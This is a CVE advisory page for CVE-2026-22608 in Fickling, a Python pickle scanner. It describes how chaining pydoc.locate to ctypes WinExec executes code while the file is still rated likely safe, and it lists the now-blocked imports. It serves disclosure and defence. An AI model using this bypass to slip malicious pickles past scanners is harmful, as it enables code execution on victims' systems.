CVE-2026-22608
Remote Code Execution via Unblocked Modules in Fickling
Publication date: 2026-01-10
Last updated on: 2026-01-10
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| trailofbits | fickling | to 0.1.7 (exc) |
| trailofbits | fickling | 0.1.7 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-502 | The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid. |
| CWE-184 | The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided resources do not contain information regarding the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
This vulnerability involves the Python pickling decompiler and static analyzer called Fickling. Before version 0.1.7, the software did not explicitly block the use of the ctypes and pydoc modules during pickle scanning. Attackers could chain these two modules together to execute arbitrary code remotely (Remote Code Execution, RCE) while the scanner still marked the file as likely safe. Specifically, the vulnerability exploits the pydoc.locate function to dynamically resolve a function pointer to ctypes.windll.kernel32.WinExec, which can then be called to execute commands like launching the Windows calculator as a proof of concept. This bypasses detection mechanisms because existing tools, including picklescan, also do not block pydoc.locate. The issue was patched in version 0.1.7 by explicitly blocking these modules. [2, 3]
How can this vulnerability impact me? :
This vulnerability can lead to remote code execution (RCE) on systems using vulnerable versions of Fickling (prior to 0.1.7). An attacker can craft malicious pickle payloads that appear safe to the scanner but actually execute arbitrary code on the target system. This can compromise system integrity, allow unauthorized actions, and potentially lead to full system compromise depending on the privileges of the affected process. [2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by using the updated version of the fickling tool (version 0.1.7 or later), which explicitly blocks unsafe imports of the ctypes and pydoc modules that were previously exploitable. The detection involves analyzing pickle payloads for unsafe imports such as 'from ctypes import CDLL' and 'from pydoc import locate'. While specific commands are not provided, running fickling's static analysis on pickle files will flag these unsafe imports and mark the payload as more severe than LIKELY_SAFE. Test cases in the project demonstrate detection of these unsafe imports by constructing pickle payloads that attempt to execute code via these modules. [3, 2]
What immediate steps should I take to mitigate this vulnerability?
The immediate step to mitigate this vulnerability is to upgrade the fickling tool to version 0.1.7 or later, where the vulnerability is patched by explicitly blocking the ctypes and pydoc modules during pickle analysis. This update prevents the bypass of security controls that allowed remote code execution via these modules. Additionally, ensure that any pickle scanning tools in use are updated to versions that include these fixes to avoid false negatives in detection. [1, 3]